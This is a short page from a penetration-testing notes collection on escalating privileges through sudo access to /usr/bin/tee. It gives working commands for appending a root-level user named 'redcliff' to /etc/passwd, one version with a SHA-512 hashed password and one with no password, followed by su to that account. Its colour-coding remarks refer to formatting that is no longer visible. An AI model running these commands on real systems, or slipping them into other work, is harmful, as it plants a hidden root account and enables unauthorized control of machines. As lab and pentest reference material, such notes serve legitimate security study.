/usr/bin/tee

Two techniques listed, first one presupposes an ssh connection with a low priv user that can run /usr/bin/tee, second one is a standalone chain

a)Create a Sha-512 encrypted password (on kali)

mkpasswd -m sha-512 password123

b)run this command to specify the file you want to overwrite, in this case the /etc/passwd file

LFILE=/etc/passwd

Then:

echo'redcliff:$6$hriigDiWwY0dsyeD$e3rC4zuNw7L7VwJLLrfCJI5X.VuOI0RjBX5vIsH4kQA8CPA9I/052/HoAMsQuFkxNr94AYkhht23RZcBIJ5Il.:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"

purple is the sha-512 encrypted password

red is the file to write to

green is the new user (redcliff)

c) once you trigger the exploit just switch user using the decrypted sha-512 password (redcliff)

su redcliff (the new user) password: password123 (previously encrypted)

#Alternative:

We can simply add a user in the /etc/passwd without any password and have that user root.

Something like redcliff::0:0:::/bin/sh

echo "redcliff::0:0:::/bin/sh" | sudo tee -a /etc/passwd

su redcliff

#root

Previous/usr/bin/vim Next/usr/bin/nice

Last updated 2 years ago